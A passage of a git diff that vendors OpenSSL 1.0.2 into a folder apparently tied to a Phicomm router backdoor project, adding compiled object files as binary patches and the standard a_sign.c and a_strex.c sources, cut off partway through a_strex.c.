diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_set.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_set.o
new file mode 100644
index 0000000000000000000000000000000000000000..25dfdb5bf297bef689f14aeaafe1532c46614929
GIT binary patch
literal 4560
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
PEjRveJ7&wzcKiPTx_+Xn

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_sign.c
new file mode 100644
index 0000000..51c6a0c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_sign.c
@@ -0,0 +1,331 @@
+/* crypto/asn1/a_sign.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <time.h>
+
+#include "cryptlib.h"
+
+#ifndef NO_SYS_TYPES_H
+# include <sys/types.h>
+#endif
+
+#include <openssl/bn.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/objects.h>
+#include <openssl/buffer.h>
+#include "asn1_locl.h"
+
+#ifndef NO_ASN1_OLD
+
+int ASN1_sign(i2d_of_void *i2d, X509_ALGOR *algor1, X509_ALGOR *algor2,
+              ASN1_BIT_STRING *signature, char *data, EVP_PKEY *pkey,
+              const EVP_MD *type)
+{
+    EVP_MD_CTX ctx;
+    unsigned char *p, *buf_in = NULL, *buf_out = NULL;
+    int i, inl = 0, outl = 0, outll = 0;
+    X509_ALGOR *a;
+
+    EVP_MD_CTX_init(&ctx);
+    for (i = 0; i < 2; i++) {
+        if (i == 0)
+            a = algor1;
+        else
+            a = algor2;
+        if (a == NULL)
+            continue;
+        if (type->pkey_type == NID_dsaWithSHA1) {
+            /*
+             * special case: RFC 2459 tells us to omit 'parameters' with
+             * id-dsa-with-sha1
+             */
+            ASN1_TYPE_free(a->parameter);
+            a->parameter = NULL;
+        } else if ((a->parameter == NULL) ||
+                   (a->parameter->type != V_ASN1_NULL)) {
+            ASN1_TYPE_free(a->parameter);
+            if ((a->parameter = ASN1_TYPE_new()) == NULL)
+                goto err;
+            a->parameter->type = V_ASN1_NULL;
+        }
+        ASN1_OBJECT_free(a->algorithm);
+        a->algorithm = OBJ_nid2obj(type->pkey_type);
+        if (a->algorithm == NULL) {
+            ASN1err(ASN1_F_ASN1_SIGN, ASN1_R_UNKNOWN_OBJECT_TYPE);
+            goto err;
+        }
+        if (a->algorithm->length == 0) {
+            ASN1err(ASN1_F_ASN1_SIGN,
+                    ASN1_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD);
+            goto err;
+        }
+    }
+    inl = i2d(data, NULL);
+    buf_in = (unsigned char *)OPENSSL_malloc((unsigned int)inl);
+    outll = outl = EVP_PKEY_size(pkey);
+    buf_out = (unsigned char *)OPENSSL_malloc((unsigned int)outl);
+    if ((buf_in == NULL) || (buf_out == NULL)) {
+        outl = 0;
+        ASN1err(ASN1_F_ASN1_SIGN, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    p = buf_in;
+
+    i2d(data, &p);
+    if (!EVP_SignInit_ex(&ctx, type, NULL)
+        || !EVP_SignUpdate(&ctx, (unsigned char *)buf_in, inl)
+        || !EVP_SignFinal(&ctx, (unsigned char *)buf_out,
+                          (unsigned int *)&outl, pkey)) {
+        outl = 0;
+        ASN1err(ASN1_F_ASN1_SIGN, ERR_R_EVP_LIB);
+        goto err;
+    }
+    if (signature->data != NULL)
+        OPENSSL_free(signature->data);
+    signature->data = buf_out;
+    buf_out = NULL;
+    signature->length = outl;
+    /*
+     * In the interests of compatibility, I'll make sure that the bit string
+     * has a 'not-used bits' value of 0
+     */
+    signature->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07);
+    signature->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+ err:
+    EVP_MD_CTX_cleanup(&ctx);
+    if (buf_in != NULL) {
+        OPENSSL_cleanse((char *)buf_in, (unsigned int)inl);
+        OPENSSL_free(buf_in);
+    }
+    if (buf_out != NULL) {
+        OPENSSL_cleanse((char *)buf_out, outll);
+        OPENSSL_free(buf_out);
+    }
+    return (outl);
+}
+
+#endif
+
+int ASN1_item_sign(const ASN1_ITEM *it, X509_ALGOR *algor1,
+                   X509_ALGOR *algor2, ASN1_BIT_STRING *signature, void *asn,
+                   EVP_PKEY *pkey, const EVP_MD *type)
+{
+    EVP_MD_CTX ctx;
+    EVP_MD_CTX_init(&ctx);
+    if (!EVP_DigestSignInit(&ctx, NULL, type, NULL, pkey)) {
+        EVP_MD_CTX_cleanup(&ctx);
+        return 0;
+    }
+    return ASN1_item_sign_ctx(it, algor1, algor2, signature, asn, &ctx);
+}
+
+int ASN1_item_sign_ctx(const ASN1_ITEM *it,
+                       X509_ALGOR *algor1, X509_ALGOR *algor2,
+                       ASN1_BIT_STRING *signature, void *asn, EVP_MD_CTX *ctx)
+{
+    const EVP_MD *type;
+    EVP_PKEY *pkey;
+    unsigned char *buf_in = NULL, *buf_out = NULL;
+    size_t inl = 0, outl = 0, outll = 0;
+    int signid, paramtype;
+    int rv;
+
+    type = EVP_MD_CTX_md(ctx);
+    pkey = EVP_PKEY_CTX_get0_pkey(ctx->pctx);
+
+    if (!type || !pkey) {
+        ASN1err(ASN1_F_ASN1_ITEM_SIGN_CTX, ASN1_R_CONTEXT_NOT_INITIALISED);
+        return 0;
+    }
+
+    if (pkey->ameth->item_sign) {
+        rv = pkey->ameth->item_sign(ctx, it, asn, algor1, algor2, signature);
+        if (rv == 1)
+            outl = signature->length;
+        /*-
+         * Return value meanings:
+         * <=0: error.
+         *   1: method does everything.
+         *   2: carry on as normal.
+         *   3: ASN1 method sets algorithm identifiers: just sign.
+         */
+        if (rv <= 0)
+            ASN1err(ASN1_F_ASN1_ITEM_SIGN_CTX, ERR_R_EVP_LIB);
+        if (rv <= 1)
+            goto err;
+    } else
+        rv = 2;
+
+    if (rv == 2) {
+        if (type->flags & EVP_MD_FLAG_PKEY_METHOD_SIGNATURE) {
+            if (!pkey->ameth ||
+                !OBJ_find_sigid_by_algs(&signid,
+                                        EVP_MD_nid(type),
+                                        pkey->ameth->pkey_id)) {
+                ASN1err(ASN1_F_ASN1_ITEM_SIGN_CTX,
+                        ASN1_R_DIGEST_AND_KEY_TYPE_NOT_SUPPORTED);
+                return 0;
+            }
+        } else
+            signid = type->pkey_type;
+
+        if (pkey->ameth->pkey_flags & ASN1_PKEY_SIGPARAM_NULL)
+            paramtype = V_ASN1_NULL;
+        else
+            paramtype = V_ASN1_UNDEF;
+
+        if (algor1)
+            X509_ALGOR_set0(algor1, OBJ_nid2obj(signid), paramtype, NULL);
+        if (algor2)
+            X509_ALGOR_set0(algor2, OBJ_nid2obj(signid), paramtype, NULL);
+
+    }
+
+    inl = ASN1_item_i2d(asn, &buf_in, it);
+    outll = outl = EVP_PKEY_size(pkey);
+    buf_out = OPENSSL_malloc((unsigned int)outl);
+    if ((buf_in == NULL) || (buf_out == NULL)) {
+        outl = 0;
+        ASN1err(ASN1_F_ASN1_ITEM_SIGN_CTX, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!EVP_DigestSignUpdate(ctx, buf_in, inl)
+        || !EVP_DigestSignFinal(ctx, buf_out, &outl)) {
+        outl = 0;
+        ASN1err(ASN1_F_ASN1_ITEM_SIGN_CTX, ERR_R_EVP_LIB);
+        goto err;
+    }
+    if (signature->data != NULL)
+        OPENSSL_free(signature->data);
+    signature->data = buf_out;
+    buf_out = NULL;
+    signature->length = outl;
+    /*
+     * In the interests of compatibility, I'll make sure that the bit string
+     * has a 'not-used bits' value of 0
+     */
+    signature->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07);
+    signature->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+ err:
+    EVP_MD_CTX_cleanup(ctx);
+    if (buf_in != NULL) {
+        OPENSSL_cleanse((char *)buf_in, (unsigned int)inl);
+        OPENSSL_free(buf_in);
+    }
+    if (buf_out != NULL) {
+        OPENSSL_cleanse((char *)buf_out, outll);
+        OPENSSL_free(buf_out);
+    }
+    return (outl);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_sign.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_sign.o
new file mode 100644
index 0000000000000000000000000000000000000000..69352ee23c68475ed4ec3fcfbf4bccde7a254131
GIT binary patch
literal 5720
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strex.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strex.c
new file mode 100644
index 0000000..35fd44c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strex.c
@@ -0,0 +1,649 @@
+/* a_strex.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/crypto.h>
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+
+#include "charmap.h"
+
+/*
+ * ASN1_STRING_print_ex() and X509_NAME_print_ex(). Enhanced string and name
+ * printing routines handling multibyte characters, RFC2253 and a host of
+ * other options.
+ */
+
+#define CHARTYPE_BS_ESC         (ASN1_STRFLGS_ESC_2253 | CHARTYPE_FIRST_ESC_2253 | CHARTYPE_LAST_ESC_2253)
+
+#define ESC_FLAGS (ASN1_STRFLGS_ESC_2253 | \
+                  ASN1_STRFLGS_ESC_QUOTE | \
+                  ASN1_STRFLGS_ESC_CTRL | \
+                  ASN1_STRFLGS_ESC_MSB)
+
+/*
+ * Three IO functions for sending data to memory, a BIO and and a FILE
+ * pointer.
+ */
+#if 0                           /* never used */
+static int send_mem_chars(void *arg, const void *buf, int len)
+{
+    unsigned char **out = arg;
+    if (!out)
+        return 1;
+    memcpy(*out, buf, len);
+    *out += len;
+    return 1;
+}
+#endif
+
+static int send_bio_chars(void *arg, const void *buf, int len)
+{
+    if (!arg)
+        return 1;
+    if (BIO_write(arg, buf, len) != len)
+        return 0;
+    return 1;
+}
+
+static int send_fp_chars(void *arg, const void *buf, int len)
+{
+    if (!arg)
+        return 1;
+    if (fwrite(buf, 1, len, arg) != (unsigned int)len)
+        return 0;
+    return 1;
+}
+
+typedef int char_io (void *arg, const void *buf, int len);
+
+/*
+ * This function handles display of strings, one character at a time. It is
+ * passed an unsigned long for each character because it could come from 2 or
+ * even 4 byte forms.
+ */
+
+static int do_esc_char(unsigned long c, unsigned char flags, char *do_quotes,
+                       char_io *io_ch, void *arg)
+{
+    unsigned char chflgs, chtmp;
+    char tmphex[HEX_SIZE(long) + 3];
+
+    if (c > 0xffffffffL)
+        return -1;
+    if (c > 0xffff) {
+        BIO_snprintf(tmphex, sizeof tmphex, "\\W%08lX", c);
+        if (!io_ch(arg, tmphex, 10))
+            return -1;
+        return 10;
+    }
+    if (c > 0xff) {
